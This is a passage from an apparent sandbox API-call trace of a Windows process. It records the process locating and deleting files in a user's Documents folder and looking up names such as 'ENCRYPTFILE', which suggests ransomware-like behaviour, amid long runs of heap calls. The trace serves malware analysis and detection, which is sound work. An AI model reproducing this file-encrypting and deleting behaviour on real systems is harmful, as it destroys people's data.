ftLastWriteTime.dwLowDateTime=0x869ba5c0, ftLastWriteTime.dwHighDateTime=0x1d5e984, nFileSizeHigh=0x0, nFileSizeLow=0x1149, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="CzDg7AgA6_wtvH.ods", cAlternateFileName="CZDG7A~1.ODS")) returned 0x41ac640 [0076.187] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\CzDg7AgA6_wtvH.ods" (normalized: "c:\\users\\fd1hvy\\documents\\czdg7aga6_wtvh.ods")) returned 1 [0076.188] FindNextFileW (in: hFindFile=0x41ac640, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e188980, ftCreationTime.dwHighDateTime=0x1d5e2d5, ftLastAccessTime.dwLowDateTime=0x869ba5c0, ftLastAccessTime.dwHighDateTime=0x1d5e984, ftLastWriteTime.dwLowDateTime=0x869ba5c0, ftLastWriteTime.dwHighDateTime=0x1d5e984, nFileSizeHigh=0x0, nFileSizeLow=0x1149, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="CzDg7AgA6_wtvH.ods", cAlternateFileName="CZDG7A~1.ODS")) returned 0 [0076.188] FindClose (in: hFindFile=0x41ac640 | out: hFindFile=0x41ac640) returned 1 [0076.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0076.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0076.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0076.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0076.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359a68 | out: hHeap=0x1780000) returned 1 [0076.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0076.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0076.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0076.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf810 | out: hHeap=0x1780000) returned 1 [0076.189] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0076.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0076.189] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0076.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0076.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0076.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0076.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9938 | out: hHeap=0x1780000) returned 1 [0076.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22e0 | out: hHeap=0x1780000) returned 1 [0076.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0076.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9920 | out: hHeap=0x1780000) returned 1 [0076.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0076.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf770 | out: hHeap=0x1780000) returned 1 [0076.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b22250 | out: hHeap=0x1780000) returned 1 [0076.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0076.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9908 | out: hHeap=0x1780000) returned 1 [0076.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c98f0 | out: hHeap=0x1780000) returned 1 [0076.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0076.189] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0076.189] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0076.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21a0 [0076.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf518 [0076.189] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0076.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf518 | out: hHeap=0x1780000) returned 1 [0076.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0076.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf518 [0076.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2150 [0076.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf590 [0076.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c98f0 [0076.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0076.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9908 [0076.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0076.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0076.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9920 [0076.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0076.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0076.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9920 | out: hHeap=0x1780000) returned 1 [0076.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0076.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0076.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9920 [0076.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb0) returned 0x42d9d90 [0076.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0076.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9920 | out: hHeap=0x1780000) returned 1 [0076.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0076.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0076.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0076.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9920 [0076.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0076.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9938 [0076.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2270 [0076.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0076.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0076.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0076.191] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0076.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0076.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0076.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0076.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0076.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0076.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0076.191] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0076.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0076.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0076.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0076.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0076.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0076.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0076.191] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Database1.accdb", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3340555c, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x3396299d, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x9daec75b, ftLastWriteTime.dwHighDateTime=0x1d3aafb, nFileSizeHigh=0x0, nFileSizeLow=0x55000, dwReserved0=0x10100c0, dwReserved1=0x8, cFileName="Database1.accdb", cAlternateFileName="DATABA~1.ACC")) returned 0x41ac700 [0076.191] FindClose (in: hFindFile=0x41ac700 | out: hFindFile=0x41ac700) returned 1 [0076.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0076.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0076.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf770 | out: hHeap=0x1780000) returned 1 [0076.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0076.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0076.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22e0 [0076.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c78 [0076.192] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0076.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c78 | out: hHeap=0x1780000) returned 1 [0076.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22e0 | out: hHeap=0x1780000) returned 1 [0076.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0076.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2180 [0076.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0076.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0076.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0076.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0076.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0076.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9bf0 [0076.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0076.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0076.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22e0 [0076.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0076.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0076.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0076.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0076.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0076.193] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0076.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0076.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0076.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0076.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0076.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0076.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0076.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0076.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0076.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0076.193] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0076.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0076.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0076.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5b8 [0076.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2200 [0076.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0076.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0076.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0076.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0076.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0076.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2300 [0076.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0076.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0076.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0076.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2320 [0076.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0076.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21a0 [0076.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0076.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d28 [0076.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0076.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0076.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0076.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0076.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0076.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0076.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0076.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0076.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0076.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0076.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0076.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0076.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0076.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0076.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0076.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21a0 [0076.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0076.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0076.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0076.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0076.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0076.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0076.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0076.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0076.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0076.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0076.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0076.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0076.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0076.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0076.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0076.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0076.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0076.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0076.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0076.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0076.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0076.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0076.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0076.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0076.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0076.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0076.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0076.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0076.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0076.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0076.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0076.196] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0076.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0076.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0076.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0076.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0076.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0076.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0076.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0076.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0076.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0076.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0076.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0076.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0076.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0076.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0076.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0076.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0076.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0076.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0076.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0076.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0076.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0076.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0076.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0076.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0076.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0076.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0076.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0076.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0076.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0076.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0076.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0076.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0076.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0076.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0076.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0076.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0076.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0076.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0076.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0076.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0076.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0076.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0076.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0076.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0076.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0076.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0076.198] HeapFree (in: 